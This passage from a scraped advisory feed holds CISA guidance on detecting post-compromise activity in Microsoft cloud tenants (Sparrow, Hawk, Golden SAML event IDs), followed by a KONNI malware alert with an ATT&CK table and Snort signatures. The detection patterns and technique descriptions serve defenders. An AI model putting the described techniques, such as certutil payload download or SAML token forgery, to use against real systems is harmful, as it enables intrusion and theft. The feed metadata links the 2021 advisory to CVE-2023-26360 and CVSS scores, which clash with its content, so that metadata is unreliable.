Review the \u201ctop actors\u201d for activity in the environment and the number of credential modifications performed.\n 3. Monitor changes in application and service principal credentials.\n 4. Investigate any instances of excessive permissions being granted, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph.\n 3. Use Sparrow to detect privilege escalation, such as adding a service principal, user, or group to a privileged role.\n 4. Use Sparrow to detect `OAuth` consent and users\u2019 consent to applications, which is useful for interpreting changes in adversary TTPs.\n 5. Use Sparrow to identify anomalous Security Assertion Markup Language (SAML) token sign-ins by pivoting on the unified audit log UserAuthenticationValue of 16457, which is an indicator of how a SAML token was built and is a potential indicator for forged SAML tokens. \n\n 1. Note that this TTP has not been the subject of significant published security research but may indicate an unusual usage of a token, such as guest access for external partners to M365 resources.\n 6. Review the PowerShell logs that Sparrow exports. \n\n 1. Review PowerShell mailbox sign-ins and validate that the logins are legitimate actions.\n 2. Review PowerShell usage for users with PowerShell in the environment.\n 7. Use Sparrow to check the Graph API application permissions of all service principals and applications in M365/Azure AD. \n\n 1. Investigate unusual activity regarding Microsoft Graph API permissions (using either the legacy [https://graph.windows.net/ ](<https://graph.windows.net/>)or <https://graph.microsoft.com>). Graph is used frequently as part of these TTPs, often to access and manipulate mailbox resources.\n 8. Review Sparrow\u2019s listed tenant\u2019s Azure AD domains, to see if the domains have been modified.\n 9. 
For customers with G5 or E5 licensing levels, review MailItemsAccessed for insight into what application identification (ID) was used for accessing users\u2019 mailboxes. Use Sparrow to query for a specific application ID using the app ID investigation capability, which will check to see if it is accessing mail or file items.\n\n 1. The MailItemsAccessed event provides auditability for mailbox data accessed via mail protocols or clients.\n 2. By analyzing the MailItemsAccessed action, incident responders can determine which user mailbox items have been accessed and potentially exfiltrated by a threat actor. This event will be recorded even in some situations where the message was not necessarily read interactively (e.g., bind or sync).[[5]](<https://docs.microsoft.com/en-us/microsoft-365/compliance/advanced-audit?view=o365-worldwide>)\n 3. The resulting suspicious application ID can provide incident responders with a pivot to detect other suspicious applications that require additional analysis.\n 4. Check for changes to applications with regards to the accessing of resources such as mail or file items.\n\n_(Updated April 8, 2021):_ Aviary can be used to assist with performing the above tasks. To install Aviary, after running Sparrow:\n\n 1. Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk.\n 1. Sparrow output will have the following default filenames, which should not be modified: `AppUpdate_Operations_Export.csv`, `AppRoleAssignment_Operations_Export.csv`, `Consent_Operations_Export.csv`, `Domain_List.csv`, `Domain_Operations_Export.csv`, `FileItems_Operations_Export.csv`, `MailItems_Operations_Export.csv`, `PSLogin_Operations_Export.csv`, `PSMailbox_Operations_Export.csv`, `SAMLToken_Operations_Export.csv`, `ServicePrincipal_Operations_Export.csv`\n 2. Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard.\n 3. 
Use the data selection filters to point to the indexed Sparrow data (see figure 1).\n\nFigure 1: Data Selection Filters\n\n#### Hawk\n\nHawk is an open-source, PowerShell-driven, community-developed tool network defenders can use to quickly and easily gather data from O365 and Azure for security investigations. Incident responders and network defenders can investigate specific user principals or the entire tenant. Data it provides include IP addresses and sign-in data. Additionally, Hawk can track IP usage for concurrent login situations.\n\nHawk users should review login details for administrator accounts and take the following steps.\n\n 1. Investigate high-value administrative accounts to detect anomalous or unusual activity (Global Admins).\n 2. Enable PowerShell logging, and evaluate PowerShell activity in the environment not used for traditional or expected purposes.\n    1. PowerShell logging does not reveal the exact `cmdlet` that was run on the tenant.\n 3. Look for users with unusual sign-in locations, dates, and times.\n 4. Check permissions of service principals and applications in M365/Azure AD.\n 5. Detect the frequency of resource access from unusual places. Use the tool to pivot to a trusted application and see if it is accessing mail or file items.\n 6. Review mailbox rules and recent mailbox rule changes.\n\n#### CrowdStrike Azure Reporting Tool\n\n[CrowdStrike's Azure Reporting Tool](<https://github.com/CrowdStrike/CRT>) (CRT) can help network defenders analyze their Microsoft Azure AD and M365 environment to help organizations analyze permissions in their Azure AD tenant and service configuration. This tool has minor overlap with Sparrow; it shows unique items, but it does not cover the same areas. CISA is highlighting this tool because it is one of the only free, open-source tools available to investigate this activity and could be used to complement Sparrow.\n\n#### Detection Tool Distinctions\n\n * Sparrow differs from CRT by looking for specific indicators of compromise associated with the recent attacks.\n * CRT focuses on the tenant\u2019s Azure AD permissions and Exchange Online configuration settings instead of the unified audit log, which gives it a different output from Sparrow or Hawk.\n * CRT returns the same broad scope of application/delegated permissions for service principals and applications as Hawk.\n * As part of its investigation, Sparrow homes in on a narrow set of application permissions given to the Graph API, which is common to the recent attacks.\n * CRT looks at Exchange Online federation configuration and federation trust, while Sparrow focuses on listing Azure AD domains.\n * Among the items network defenders can use CRT to review are delegated permissions and application permissions, federation configurations, federation trusts, mail forwarding rules, service principals, and objects with KeyCredentials.\n\n#### Detection Methods\n\nMicrosoft breaks the threat actor\u2019s recent activity into four primary stages, which are described below along with associated detection methods. Microsoft describes these stages as beginning with all activity after the compromise of the on-premises identity solution, such as ADFS.[[6]](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610>)\n\nNote: this step provides an entry vector to cloud technology environments, and is unnecessary when the threat actor has compromised an identity solution or credential that allows the APT direct access to the cloud (e.g., without leveraging the SolarWinds Orion vulnerability).\n\n**Stage 1: Forging a trusted authentication token used to access resources that trust the on-premises identity provider**\n\nThese attacks (often referred to as \u201cGolden Security Assertion Markup Language\u201d attacks) can be analyzed using a combination of cloud-based and standard on-premises techniques.[[7]](<https://www.sygnia.co/golden-saml-advisory>) For example, network defenders can use `OAuth` claims for specific principals made at the Azure AD level and compare them to the on-premises identity.\n\nExport sign-in logs from the Azure AD portal and look at the Authentication Method field.\n\n**Note**: at portal.azure.com, click on a user and review the authentication details (e.g., date, method, result). Without Sentinel, this is the only way to get these logs, which are critical for this effort.\n\n**_Detection Method 1: Correlating service provider login events with corresponding authentication events in Active Directory Federation Services (ADFS) and Domain Controllers_**\n\nUsing SAML single sign-on, search for any logins to service providers that do not have corresponding event IDs 4769, 1200, and 1202 in the domain.\n\n**_Detection Method 2: Identifying certificate export events in ADFS_**\n\nLook for:\n\n 1. The IP address and Activity_ID in EventCode 410 and the Activity_ID and Instance_ID in EventCode 500.\n 2. Export-PfxCertificate or certutil-exportPFX in Event IDs 4103 and 4104, which may include detection of a certificate extraction technique.\n 3. Deleted certificate extraction with ADFSdump performed using Sysmon Event ID 18 with the pipe name \\microsoft##wid\\tsql\\query (exclude processes regularly making this pipe connection on the machine).\n 4. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event).\n\n**_Detection Method 3: Customizing SAML response to identify irregular access_**\n\nThis method serves as prevention for the future (and would only detect future, not past, activity), as it helps identify irregularities from the point of the change forward. Organizations can modify SAML responses to include custom elements for each service provider to monitor and detect any anomalous requests.[[8]](<https://www.sygnia.co/golden-saml-advisory>)\n\n**_Detection Method 4: Detecting malicious ADFS trust modification_**\n\nA threat actor who gains administrative access to ADFS can add a new, trusted ADFS rather than extracting the certificate and private key as part of a standard Golden SAML attack.[[9]](<https://www.sygnia.co/golden-saml-advisory>)\n\nNetwork defenders should look for:\n\n 1. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details. (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event.)\n    1. Review events, particularly searching for Configuration: Type: IssuanceAuthority where Property Value references an unfamiliar domain.\n 2. Possible activity of an interrogating ADFS host by using ADFS PowerShell plugins. Look for changes in the federation trust environment that would indicate new ADFS sources.\n\n**Stage 2: Using the forged authentication token to create configuration changes in the Service Provider, such as Azure AD (establishing a foothold)**\n\nAfter the threat actor has compromised the on-premises identity provider, they identify their next series of objectives by reviewing activity in the Microsoft Cloud activity space (Microsoft Azure and M365 tenants).\n\nThe threat actor uses the ability to forge authentication tokens to establish a presence in the cloud environment. The actor adds additional credentials to an existing service principal. Once the threat actor has impersonated a privileged Azure AD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud).\n\nNetwork defenders should take the following steps.\n\n 1. Audit the creation and use of service principal and application credentials. Sparrow will detect modifications to these credentials.\n    1. Look for unusual application usage, such as dormant or forgotten applications being used again.\n    2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application.\n 2. Look for unexpected trust relationships that have been added to Azure AD. (Download the last 30 days of non-interactive sign-ins from the Azure portal or use Azure Sentinel.)[[10]](<https://docs.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadserviceprincipalsigninlogs>)\n 3. Use Hawk (and any sub-modules available) to run an investigation on a specific user. Hawk will provide IP addresses, sign-in data, and other data. Hawk can also track IP usage in concurrent login situations.\n 4. Review login details for administrator accounts (e.g., high-value administrative accounts, such as Global Admins). Look for unusual sign-in locations, dates, and times.\n 5. Review new token validation time periods with high values and investigate whether the changes are legitimate or a threat actor\u2019s attempts to gain persistence.\n 6. Examine highly privileged accounts; specifically using sign-in logs, look for unusual sign-in locations, dates, and times.\n 7. Create a timeline for all credential changes.\n 8. Monitor changes in application credentials (the script will export into csv named AppUpdate_Operations_Export).\n\n**Stage 3: Acquiring an `OAuth` access token for the application using the forged credentials added to an existing application or service principal and calling APIs with the permissions assigned to that application**\n\nIn some cases, the threat actor has been observed adding permissions to existing applications or service principals. Additionally, the actor has been seen establishing new applications or service principals briefly and using them to add permissions to the existing applications or service principals, possibly to add a layer of indirection (e.g., using it to add a credential to another service principal, and then deleting it).[[11]](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610>)\n\nNetwork defenders should use Sparrow to:\n\n 1. Detect service principal credentials change and service principal change (e.g., if an actor adds new permissions or expands existing permissions).\n    1. Export and view this activity via the ServicePrincipal_Operations_Export.\n 2. Record `OAuth` consent and consent to applications.\n    1. Export and view this record via the Consent_Operations_Export file.\n 3. Investigate instances of excessive high permissions, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph.\n    1. Review Microsoft Graph API permissions granted to service principals.\n    2. Export and view this activity via the ApplicationGraphPermissions csv file.\n        1. **Note:** Hawk can also return the full list of service principal permissions for further investigation.\n    3. Review top actors and the amount of credential modifications performed.\n    4. Monitor changes in application credentials.\n 4. Identify manipulation of custom or third-party applications.\n    1. Network defenders should review the catalog of custom or third-party vendors with applications in the Microsoft tenant and perform the above interrogation principles on those applications and trusts.\n 5. Review modifications to federation trust settings.\n    1. Review new token validation time periods with high values and investigate whether this was a legitimate change or an attempt to gain persistence by the threat actor.\n 6. Detect the escalation of privileges, including the addition of Service Principals (SP) to privileged roles. The script exports this data into a csv called AppRoleAssignment_Operations_Export.\n\n**Stage 4: Once access has been established, the threat actor uses Microsoft Graph API to conduct action on objectives from an external RESTful API (queries impersonating existing applications).**\n\nNetwork defenders should:\n\n 1. In MailItemsAccessed operations, found within the Unified Audit Log (UAL), review the application ID used (requires G5 or E5 license for this specific detail).\n 2. Query the specific application ID, using the Sparrow script\u2019s app ID investigation capability to interrogate mail and file items accessed for that application ID. (Use the application ID utility for any other suspicious apps that require additional analysis.)\n 3. Check the permissions of an application in M365/Azure AD using Sparrow.\n    1. Hawk will return Azure_Application_Audit, and Sparrow will return ApplicationGraphPermissions.\n    2. Network defenders will see the IP address that Graph API uses.\n    3. Note: the Microsoft IP address may not show up as a virtual private server/anonymized endpoint.\n 4. Investigate a specific service principal, if it is a user-specific user account, in Hawk. This activity is challenging to see without Azure Sentinel or manually downloading and reviewing logs from the sign-in portal.\n\n#### Microsoft Telemetry Nuances\n\nThe existing tools and techniques used to evaluate cloud-based telemetry sources present challenges not represented in traditional forensic techniques. Primarily, the amount of telemetry retention is far less than the traditional logging facilities of on-premises data sources. Threat actor activity that is more than 90 days old is unlikely to have been saved by traditional sources or be visible with the Microsoft M365 Management API or in the UAL.\n\nService principal logging is available using the Azure Portal via the \"Service Principal Sign-ins\" feature. Enable settings in the Azure Portal (see \u201cDiagnostic Setting\u201d) to ingest logs into Sentinel or a third-party security information and event management (SIEM) tool. An Azure Premium P1 or Premium P2 license is necessary to access this setting as well as other features, such as a log analytics workspace, storage account, or event hub.[[12]](<https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-all-sign-ins>) These logs must be downloaded manually if not ingested by one of the methods listed in the Detection Methods section.\n\nGlobal Administrator rights are often required by tools other than Hawk and Sparrow to evaluate M365 cloud security posture. Logging capability and visibility of data varies by licensing models and subscription to premium services, such as Microsoft Defender for O365 and Azure Sentinel. According to CrowdStrike, \"There was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible.\"[[13]](<https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/>)\n\nDocumentation for specific event codes, such as UserAuthenticationMethod 16457, which may indicate a suspicious SAML token forgery, is no longer available in the M365 Unified Access Log. Auditing narratives on some events no longer exist as part of core Microsoft documentation sources.\n\nThe use of industry-standard SIEMs for log detection is crucial for providing historical context for threat hunting in Microsoft cloud environments. Standard G3/E3 licenses only provide 90 days of auditing; with the advanced auditing license that is provided with a G5/E5 license, audit logs can be extended to retain information for a year. CISA notes that this license change is proactive, rather than reactive: it allows enhanced visibility and features for telemetry from the moment of integration but does not provide retroactive visibility on previous events or historical context.\n\nA properly configured SIEM can provide:\n\n 1. Longer term storage of log data.\n 2. Cross correlation of log data with endpoint data and network data (such as those produced by ADFS servers), endpoint detection and response data, and identity provider information.\n 3. Ability to query use of application connectors in Azure.\n\nBuilt-in tools, such as Microsoft Cloud Services and M365 applications, provide much of the same visibility available from custom tools and are mapped to the MITRE ATT&CK framework and easy-to-understand dashboards.[[14]](<https://splunkbase.splunk.com/app/3786/>) However, these tools often do not have the ability to pull historical data older than seven days. Therefore, storage solutions that appropriately meet governance standards and usability metrics for analysts for the SIEM must be carefully planned and arranged.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) (UNCLASS)\n * us-cert@dhs.sgov.gov (SIPRNET)\n * us-cert@dhs.ic.gov (JWICS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. 
Reporting forms can be found on the CISA/US-CERT homepage at <http://www.us-cert.cisa.gov/>.\n\n### Resources\n\nAzure Active Directory Workbook to Assess Solorigate Risk: <https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718>\n\nVolexity - Dark Halo Leverages SolarWinds Compromise to Breach Organizations: <https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/>\n\nHow to Find Activity with Sentinel:[ https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/](<https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/>)\n\nThird-Party Walkthrough of the Attack: <https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/>\n\nNational Security Agency Advisory on Detecting Abuse of Authentication Mechanisms: <https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF>\n\nMicrosoft 365 App for Splunk: <https://splunkbase.splunk.com/app/3786/>\n\nCISA Remediation Guidance: <https://us-cert.cisa.gov/ncas/alerts/aa20-352a>\n\n### References\n\n[[1] ZDNet: A Second Hacking Group has Targeted SolarWinds Systems ](<https://www.zdnet.com/article/a-second-hacking-group-has-targeted-solarwinds-systems/>)\n\n[[2] CISA: Supply Chain Compromise ](<https://www.cisa.gov/supply-chain-compromise>)\n\n[[3] Microsoft SolarWinds Post-Compromise Hunting with Azure Sentinel ](<https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095>)\n\n[[4] Microsoft Solorigate Resource Center ](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/>)\n\n[[5] Advanced Audit in Microsoft 365 ](<https://docs.microsoft.com/en-us/microsoft-365/compliance/advanced-audit?view=o365-worldwide>)\n\n[[6] Microsoft: Understanding 
\u201cSolorigate\u2019s\u201d Identity IOCs ](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610>)\n\n[[7] Detection and Hunting of Golden SAML Attack: ](<https://www.sygnia.co/golden-saml-advisory>)\n\n[[8] Ibid](<https://www.sygnia.co/golden-saml-advisory>)\n\n[[9] Ibid](<https://www.sygnia.co/golden-saml-advisory>)\n\n[[10] Microsoft: AADServicePrincipalSignInLogs](<https://docs.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadserviceprincipalsigninlogs>)\n\n[[11] Microsoft: Understanding \u201cSolorigate\u2019s\u201d Identity IOCs ](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610>)\n\n[[12] Azure Active Directory Sign-in Activity Reports](<https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-all-sign-ins>)\n\n[[13] CrowdStrike: CrowdStrike Launches Free Tool to Identify and Help Mitigate Risks in Azure Active Directory ](<https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/>)\n\n[[14] Microsoft 365 App for Splunk ](<https://splunkbase.splunk.com/app/3786/>)\n\n### Revisions\n\nInitial version: January 8, 2021|February 4, 2021: Removed link and section for outdated product feedback form|April 8, 2021: Added Aviary Dashboard information|April 15, 2021: Added Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-04-15T12:00:00", "type": "ics", "title": 
"Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-04-15T12:00:00", "id": "AA21-008A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-008a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:05:10", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.\n\n### Technical Details\n\nKONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code (_Phishing: Spearphising Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]). 
The malicious code can change the font color from light grey to black (to trick the user into enabling content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)]).\n\nOnce the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies `certutil.exe` into a temp directory and renames it to evade detection.\n\nThe cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, [KONNI](<https://attack.mitre.org/versions/v7/software/S0356/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: KONNI ATT&CK techniques_\n\n**Technique** | **Use** \n---|--- \n \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n\n| \n\nKONNI can collect the Internet Protocol address from the victim\u2019s machine. \n \n_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n\n| \n\nKONNI can collect the username from the victim\u2019s machine. \n \n_Masquerading: Match Legitimate Name or Location _[[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005>)]\n\n| \n\nKONNI creates a shortcut called `Anti virus service.lnk `in an apparent attempt to masquerade as a legitimate file. 
\n \n_Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol _[[T1048.003](<https://attack.mitre.org/versions/v7/techniques/T1048/003>)]\n\n| \n\nKONNI has used File Transfer Protocol to exfiltrate reconnaissance data. \n \n_Input Capture: Keylogging _[[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n\n| \n\nKONNI has the capability to perform keylogging. \n \n_Process Discovery _[[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057>)]\n\n| \n\nKONNI has used `tasklist.exe` to get a snapshot of the current processes\u2019 state of the target machine. \n \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001>)]\n\n| \n\nKONNI used PowerShell to download and execute a specific 64-bit version of the malware. \n \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003>)]\n\n| \n\nKONNI has used `cmd.exe` to execute arbitrary commands on the infected host across different stages of the infection chain. \n \n_Indicator Removal on Host: File Deletion_ [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004>)]\n\n| \n\nKONNI can delete files. \n \n_Application Layer Protocol: Web Protocols _[[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n\n| \n\nKONNI has used Hypertext Transfer Protocol for command and control. \n \n_System Information Discovery _[[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n\n| \n\nKONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine and has used `systeminfo.exe` to get a snapshot of the current system state of the target machine. 
\n \n_File and Directory Discovery_ [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083>)]\n\n| \n\nA version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. \n \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v7/techniques/T1105>)]\n\n| \n\nKONNI can download files and execute them on the victim\u2019s machine. \n \n_Modify Registry _[[T1112](<https://attack.mitre.org/versions/v7/techniques/T1112>)]\n\n| \n\nKONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence. \n \n_Screen Capture _[[T1113](<https://attack.mitre.org/versions/v7/techniques/T1113>)]\n\n| \n\nKONNI can take screenshots of the victim\u2019s machine. \n \n_Clipboard Data _[[T1115](<https://attack.mitre.org/versions/v7/techniques/T1115>)]\n\n| \n\nKONNI had a feature to steal data from the clipboard. \n \n_Data Encoding: Standard Encoding _[[T1132.001](<https://attack.mitre.org/versions/v7/techniques/T1132/001>)]\n\n| \n\nKONNI has used a custom base64 key to encode stolen data before exfiltration. \n \n_Access Token Manipulation: Create Process with Token_ [[T1134.002](<https://attack.mitre.org/versions/v7/techniques/T1134/002>)]\n\n| \n\nKONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user. \n \n_Deobfuscate/Decode Files or Information_ [[T1140](<https://attack.mitre.org/versions/v7/techniques/T1140>)]\n\n| \n\nKONNI has used CertUtil to download and decode base64 encoded strings. \n \n_Signed Binary Proxy Execution: Rundll32_ [[T1218.011](<https://attack.mitre.org/versions/v7/techniques/T1218/011>)]\n\n| \n\nKONNI has used Rundll32 to execute its loader for privilege escalation purposes. 
\n \n_Event Triggered Execution: Component Object Model Hijacking _[[T1546.015](<https://attack.mitre.org/versions/v7/techniques/T1546/015>)]\n\n| \n\nKONNI has modified ComSysApp service to load the malicious DLL payload. \n \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001>)]\n\n| \n\nA version of KONNI drops a Windows shortcut into the Startup folder to establish persistence. \n \n_Boot or Logon Autostart Execution: Shortcut Modification_ [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n\n| \n\nA version of KONNI drops a Windows shortcut on the victim\u2019s machine to establish persistence. \n \n_Abuse Elevation Control Mechanism: Bypass User Access Control _[[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n\n| \n\nKONNI bypassed User Account Control with the \"AlwaysNotify\" settings. \n \n_Credentials from Password Stores: Credentials from Web Browsers _[[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n\n| \n\nKONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera. 
\n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signatures for use in detecting KONNI malware exploits.\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI contains '/weget/*.php' (KONNI)\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; depth:7; offset:0; fast_pattern; content:\".php\"; http_uri; distance:0; within:12; content:!\"Referrer|3a 20|\"; http_header; classtype:http-uri; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|HTTP|0d 0a|\"; http_header; fast_pattern:only; content:\"POST\"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; fast_pattern:only; pcre:\"/^\\/weget\\x2f(?:upload|uploadtm|download)\\.php/iU\"; content:\"POST\"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)`\n\n### Mitigations\n\nCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://us-cert.cisa.gov/ncas/tips/ST18-271>).\n * Keep operating system patches up to date. See [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. 
If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, \"[Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\"\n\n### Resources\n\n * [d-hunter \u2013 A Look Into KONNI 2019 Campaign](<https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b%20>)\n * [MITRE ATT&CK \u2013 KONNI 
